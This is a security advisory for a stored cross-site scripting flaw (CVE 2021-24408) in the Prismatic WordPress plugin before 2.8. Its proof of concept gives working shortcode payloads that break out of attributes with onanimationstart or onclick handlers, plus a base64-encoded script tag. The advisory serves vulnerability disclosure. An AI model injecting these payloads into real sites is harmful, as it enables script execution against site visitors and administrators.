Prismatic < 2.8 – Contributor+ Stored XSS | CVE 2021-24408

Description

The plugin does not sanitise or validate some of its shortcode parameters, allowing users with a role as low as Contributor to set Cross-Site payload in them. A post made by a contributor would still have to be approved by an admin to have the XSS trigger able in the frontend, however, higher privilege users, such as editor could exploit this without the need of approval, and even when the blog disallows the unfiltered_html capability.

Injection Points:
1) prismatic_code shortcode's "class" attribute
2) prismatic_encoded shortcode-like syntax with HTML attributes nested inside prismatic_code shortcode
3) Base-64ed payload inside prismatic_encoded shortcode-like syntax nested inside prismatic_code shortcode

Proof of Concept

This contains three XSS (all injected at different locations).

[prismatic_code class='hello" style="animation-name:twentytwentyone-close-button-transition;" onanimationstart="alert(1)']
[prismatic_encoded style=%%animation-name:twentytwentyone-close-button-transition;%% onanimationstart=%%alert(2)%%]PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+[/prismatic_encoded]
[/prismatic_code]


The first two payloads via the animation-name/onanimationstart are specific to the Twenty Twenty-One theme (and will be triggered w/o user interaction other than accessing the page)

To try with another theme (requires the user to click on the generated elements in the page to trigger the first two XSS):
[prismatic_code class='hello" onclick="alert(1)']
[prismatic_encoded onclick=%%alert(2)%%]PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+[/prismatic_encoded]
[/prismatic_code]


PHNjcmlwdD5hbGVydChvcmlnaW4pPC9zY3JpcHQ+ = base64("<script>alert(origin)</script>")